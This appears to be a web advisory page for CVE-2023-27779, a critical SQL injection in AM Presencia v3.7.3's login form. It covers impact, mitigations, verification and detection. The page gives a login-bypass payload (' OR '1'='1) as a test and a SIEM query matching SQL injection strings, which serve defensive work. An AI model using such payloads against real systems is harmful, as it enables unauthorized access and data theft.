CVE-2023-27779 – AM Presencia v3.7.3 contains a SQL injection vu... (How to Fix)

Q: What is the severity of CVE-2023-27779?

CVE-2023-27779 has a CVSS score of 9.8 (CRITICAL). AM Presencia v3.7.3 contains a SQL injection vulnerability in the login form's user parameter, allowing attackers to execute arbitrary SQL commands. This affects all systems running this specific version of AM Presencia software. Successful exploitation could lead to authentication bypass, data theft, or complete system compromise.

📋 TL;DR

AM Presencia v3.7.3 contains a SQL injection vulnerability in the login form's user parameter, allowing attackers to execute arbitrary SQL commands. This affects all systems running this specific version of AM Presencia software. Successful exploitation could lead to authentication bypass, data theft, or complete system compromise.

💻 Affected Systems

Products:

AM Presencia

Versions: v3.7.3

Operating Systems: Any OS running AM Presencia

Default Config Vulnerable: ⚠️ Yes

Notes: Only version 3.7.3 is confirmed affected; other versions may also be vulnerable but not confirmed.

📦 What is this software?

Am Presencia by Amsystem

View all CVEs affecting Am Presencia →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise leading to data exfiltration, privilege escalation to administrative access, and potential remote code execution on the underlying server.

🟠

Likely Case

Authentication bypass allowing unauthorized access to the system, followed by data extraction from the database and potential lateral movement within the network.

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries preventing SQL injection, though authentication attempts may still be logged.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

SQL injection in login form typically requires minimal technical skill to exploit using standard SQLi techniques.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://amsystem.es/

Restart Required: No

Instructions:

1. Check vendor website for security updates. 2. Apply any available patches. 3. Test the login functionality after patching.

🔧 Temporary Workarounds

Web Application Firewall (WAF)

all

Deploy a WAF with SQL injection protection rules to block malicious login attempts.

Input Validation Filter

all

Implement server-side input validation to reject suspicious characters in the user parameter.

🧯 If You Can't Patch

Implement parameterized queries or prepared statements in the login functionality
Deploy network segmentation to isolate the AM Presencia system from critical assets

🔍 How to Verify

Check if Vulnerable:

Test the login form with SQL injection payloads like ' OR '1'='1 in the username field and observe if authentication bypass occurs.

Check Version:

Check the software version in the application interface or configuration files.

Verify Fix Applied:

Retest with the same SQL injection payloads after applying fixes; successful authentication should be blocked.

📡 Detection & Monitoring

Log Indicators:

Multiple failed login attempts with SQL keywords
Unusual database query patterns from the application server
Successful logins from unexpected IP addresses

Network Indicators:

HTTP POST requests to login endpoint containing SQL syntax
Abnormal database traffic from web server

SIEM Query:

source="web_logs" AND (uri="/login" OR uri="/auth") AND (request_body CONTAINS "' OR" OR request_body CONTAINS "' UNION" OR request_body CONTAINS "' SELECT")

📊 Metadata

CVE ID: CVE-2023-27779

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-89

Published: April 13, 2023

Last Updated: February 7, 2025

🔗 References

http://alo.com Not Applicable
https://amsystem.es/ Product
https://docs.google.com/document/d/1kGzmc6AOCfRzJf9mDz4emkhQj84Y1XemmAMZjYK32-o/edit?usp=sharing Exploit,Third Party Advisory
https://portalempleado.alosuite.com/home Not Applicable
http://alo.com Not Applicable
https://amsystem.es/ Product
https://docs.google.com/document/d/1kGzmc6AOCfRzJf9mDz4emkhQj84Y1XemmAMZjYK32-o/edit?usp=sharing Exploit,Third Party Advisory
https://portalempleado.alosuite.com/home Not Applicable

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-27779, you might also want to check these: